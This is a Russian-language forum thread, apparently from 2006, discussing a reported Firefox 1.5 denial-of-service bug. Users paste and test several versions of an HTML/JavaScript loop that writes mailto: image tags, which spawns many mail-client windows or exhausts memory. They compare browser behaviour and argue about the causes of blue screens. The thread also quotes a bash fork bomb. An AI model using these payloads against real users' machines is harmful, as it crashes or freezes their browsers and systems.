> У меня видимо разгон

Синий экран это либо переразогнанная память, либо болтающиеся PCI-платы. Вынь платы и память, продуй от пыли, притри их в разъёмах... Ну и разгон с памяти сними.

А у переразогнанного процессора симптомы совсем другие. Просто одна картинка на экране, писк из колонок и мёртвый вис.

>Открылось сто потому что в цикле на джава скрипт стоит сто посмотри код страницы, а если запустить бесконечный цикл.

а лимиты уже не в моде?

>Проверил на нескольких машинах Ужасный DOS выглядит везде вот так http://img160.imageshack.us/img160/5568/fakeffdos7nm.png

у меня та же картинка. просто, оно потому, что не настроена фича автоматического открывания почтового клиента при клацаньи линка на мыло, типа mailto:pupkin@email

такими DoS детей только пугать, которые не умеют защититься от :(){ :|:& };:

http://en.wikipedia.org/wiki/Fork_bomb

> Ты покури еще своей дури - еще и не такое услышишь, да что там
> услышишь, еще и бардовых крокодилов на дереве увидишь.

Бардовые крокодилы - это которые бардовские песни поют?

<Head>
<Title>test2 by securityview</Title>
</Head>

<Body>
<SCRIPT Language="Javascript">
for(i=0;; i++){
document.write('<Img src="mailto:test@securityview.org?subject=test email&body=DoS!">')
}
</SCRIPT>
</Body>

Создайте файлик .html с вышеприведённым кодом - и попробуйте открыть в Лисе...
Цикл бесконечный... Эксплорер - спросил "Вырубить медленный скрипт"...
Опера - открыла страницу с незагруженными картинками... А Лису - страшно запускать...

Фокс повис намертво, вернее не повис, а все это дело грузит отжирая оперативку. Эх фаерфокс-фаерфокс. Казалось бы, открытый код в отличии от ие и оперы, а вылизать не могут.

FF до бесконечности выполняет бесконечный цикл- почему это кого-то так удивляет?

" `yes` "

тоже всю доступную оперативку сожрет- эксплойт?

создал файл со всей этой байдой, открыл в огнелисе, секунды 3 подумало, выкинуло диалог "A script on this page may be busy, or it may have stopped responding. You can stop the script now, or you can continue to see if the script will complete" (Continue) (Stop script)

открыл в konqueror, тот сказал: "A script on this page is causing KHTML to freeze. If it continues to run, other applications may become less responsive." (Abort) (Continue)

открыл в опере: опера стала жрать память (поhtop увидел), дошла до половины свопа (секунд 30) и упала...

IE нету, и лень ставить под wine, думаю, итог был бы "wine начало жрать память дошло до лимита и упало"

> почему это кого-то так удивляет? потому что другие браузеры себя нормально ведут.

> тоже всю доступную оперативку сожрет- эксплойт?

да..

хм..а батин аутлук вообще пропал, сам бинарь..хм..

Почему в вышеприведенной интерпритации виснет фокс, а не открывается много окон аутлука?

> открылось 71 окошко xterm с mutt
а этот эксплоит не предназначен для извращенцев.

попробовал в IE6 из под Wine.
открылось ОДНО окошко с KMail. Со словом "DoS!" в теле письма. и все. У меня наверное руки кривые или что я делаю не так?

не приятно однако - выскочило 100 окон thunderbird'a с сообщением. в результате увеличение использования памяти метров на 120! правда при этом работало все нормольно можноприбить процесс. Slackware + Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2

>Почему в вышеприведенной интерпритации виснет фокс, а не открывается много окон аутлука?
FF прибивает скрипт через 5 секунд- по версии авторов аутлук за это время успеет повесить винду

Вот так круче.

<Head>
<Title>test2 by securityview</Title>
</Head>

<Body>
<SCRIPT Language="Javascript">
for(i=0;i<1000; i++){
document.write('<Img src="mailto:test@securityview.org?subject=test email&body=DoS!">')
}
</SCRIPT>
</Body>

>открыл в опере: опера стала жрать память (поhtop увидел), дошла до половины свопа (секунд 30) и упала...

Нех пиздеть - опера 9 какой-то из древних билдов - не повис и память не отожрал.

1000 круче бесконечности?

работает, под виндой - многократно запускает outluk

>Нех пиздеть - опера 9 какой-то из древних билдов...
Оперы 9 еще нет

>BSOD в 99% случаев это -- битая память, некачественный блок питания, кривые драйверы, разгон.

+1

Я бы даже сказал, что в 99.9%

Последний раз "нежелезный" BSOD видел во времена ранних Win2000. Не смотря на то, что десятками машин рулил.

При чём чаще всего при "железном" BSOD'е виновата память. Нередко глюки такие хитрые, что ни одним тестом не отлавливаются, только по CRC-error многогигабайтных архивов.

Кстати, все из себя защищённые NT-подобные винды валятся (или коматозятся так что проще резет нажать) от абсолютно безобидного Fast Tracker. А в W98 всё работает как часы. :)

>Оперы 9 еще нет

Если "официальная бета" для тебя = "нет", то это в клинику.

фф начинает запускать почтового клента после ОКОНЧАНИЯ работы скрипта.

>по заявлениям Microsoft,

ага. а уж как они над энкартой надругались

У меня не сработало ничего. Вид --- как на вышепреведенной ссылке http://img160.imageshack.us/img160/5568/fakeffdos7nm.png И тишинаааа... :)

У меня запустилось 72 ThunderBird и выключились.... с ошибкой а в "глючном" файрфоксе все работет и я отчет из него же пишу

> Ну или жабовское апп какое запустить - тож хороший индикатор. JVM если падает по собственной ошибке, то успевает оставить дамп. А если по причине памяти - то без оного..

Здрасте, а ядерный дамп что ли уже не устраивает при битой памяти?

>>Угу, ring0 и ring3 это миф. Ты покури еще своей дури - еще и не такое услышишь, да что там услышишь, еще и бардовых крокодилов на дереве увидишь.

Вот, а я думал, как бы слова правильные подобрать %)

Opera как всегда рулит.

ёRe: Firefox 1.5.0.3 подвержен DoS атакам

>Эх фаерфокс-фаерфокс. Казалось бы, открытый код в отличии от ие и оперы, а вылизать не могут.

konqueror?

И потом вспомним про дыры в ишаке, как много народу отымеется до выхода "заплатки", и, плюясь, вернёмся к фф =)

>Как-то сделал себе homepage с простеньким javascript что менял по определенному алгоритму картинки. Хотел добиться эффекта a-la matrix или thief. В результате IE падал при просмотре, причем только если скорость соединения была невысокой. :-) Ну а Mozilla съедала все на ура.

Весело ;) Может картинки заранее не подгружались, до начала выполнения остальных функций?

> Создайте файлик .html с вышеприведённым кодом - и попробуйте открыть в Лисе...

Таки да, виснет. Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.0.2) Gecko/20060419 Fedora/1.5.0.2-1.2.fc5 Firefox/1.5.0.2 pango-text

>И потом вспомним про дыры в ишаке, как много народу отымеется до выхода "заплатки", и, плюясь, вернёмся к фф =)

Если и убегать от FF, то на Opera! А "неправильная идеология" оперы пофиг, главное что браузер очень качественный.

> Если и убегать от FF, то на Opera! А "неправильная идеология" оперы пофиг, главное что браузер очень качественный.

Долго сидел на опере, ФФ удобнее. Особенно прёт ФФшный поиск - просто суперфишка.

>Таки да, виснет.

+1, в отличие от Konquer'a ;)

А вот опера-8.51 втихую за минуту всю память откушала =) Сначала незаметно было, казалось что она прибила цикл, и даже начал её в этом посте расхваливать, как вдруг - на горизонте показался МедведЪ =)

konqueror так умеет.. ну почти так ;) Причём кошерно, по нажатию "/" - случайно обнаружил после полуночного чтения манов =)

>Особенно прёт ФФшный поиск - просто суперфишка.

Имеется ввиду поиск по странице или поисковики? В опере девятке с первым все супер (есть подсветка и прочие дела), а со вторым дела обстоят даже получше чем у фокса - например можно создавать новые поисковики тремя кликами мыши, а в настройках уже есть встроенный редактор поисковиков.

> Причём кошерно, по нажатию "/"

Открой для себя чудесный мир ff - он тоже так умеет. =)

Вот спасибо!

Молодец этот atrus: дал правильную штуку.
Я вот параметр заменил, какой надо, специально в винду вылез! И шо?
ФФ так и сказал: "один линк надо открыть в почтовом клиенте, разрешить? имей в виду, что это может быть использованием уязвимости!"
Ну разумеется я поставил галочку "не спрашивать более" и нажал отмену. Хде атака? Нету..

Браузер должен браузить, отдельно от всяких изврафич, IMHO

> 1000 круче бесконечности?

Да нет, просто 1000 окошек тебе и твоему бедному WM вполне хватит, чтобы загрустить.

>Открой для себя чудесный мир ff - он тоже так умеет. =)

Опера так умела еще во времена когда не было FF. Плюс к этому есть поиск по ссылкам на странице (хоткей "," ). фичами? Эксплоит это же не фича :).

>Браузер должен браузить, отдельно от всяких изврафич, IMHO

А что понимается под "изврафичами"? Эксплоит это не фича ;).

<Head> <Title>test2 by securityview</Title> </Head>

<Body> <SCRIPT Language="Javascript"> for(i=0;; i++){ document.write('<Img src="mailto:test'+i+'@securityview.org?subject=test email&body=DoS!">') } </SCRIPT> </Body>

а если сделать так, то и ie хана

Причем тут JS дурилка?

Зашёл на http://securityview.org/test.html - ничего не произошло :(

P.S. NoScript rulez!

кстати seamonkey и в винде не падает)

>> Угу, ring0 и ring3 это миф. Ты покури еще своей дури - еще и не такое услышишь, да что там услышишь, еще и бардовых крокодилов на дереве увидишь.
> Вот, а я думал, как бы слова правильные подобрать %)

Говенда как была m$-DoS'ом, так им же и осталась. Те же самые 8.3 "кое-где" промелькивающие, cp866 в консоли, возможность завалить ядрышко из юзерспейса и прочие "прелести". Так что пeсдeть будете на винфаке, а здесь вам никто не поверит. ;-)

>BSOD в 99% случаев это -- битая память, некачественный блок питания, кривые драйверы, разгон.

Точно.

>http://securityview.org/test.html

Зашел на страницу. Вывелось окно аутлук с сообщение DoS! И все.

А, на отдельном табе было штук сорок неоткрывшихся картинок. ff 1.0.6

Не понял насколько ранние версии подвержены.

Firefox 1.0.7

Открывает ОДНО окно e-Mail, которое преспокойно можно закрыть или не закрывать. другие окна не открываются, пока в эксплойте не кликнуть правой мышей "показать картинку" на одну из 100 иконок.

опять открывается одно единственное окно. Остальной Outlook не виснет и не глючит.

в чём моя ошибка?? ;)

>А у переразогнанного процессора симптомы совсем другие. Просто одна картинка на экране, писк из колонок и мёртвый вис.

У меня тут блок питания глючил - винт не подцеплялся, плата с дополнительным USB глючила, машина перегружалась иногда и в линукс, и в винде.

Заменил - полет нормальный.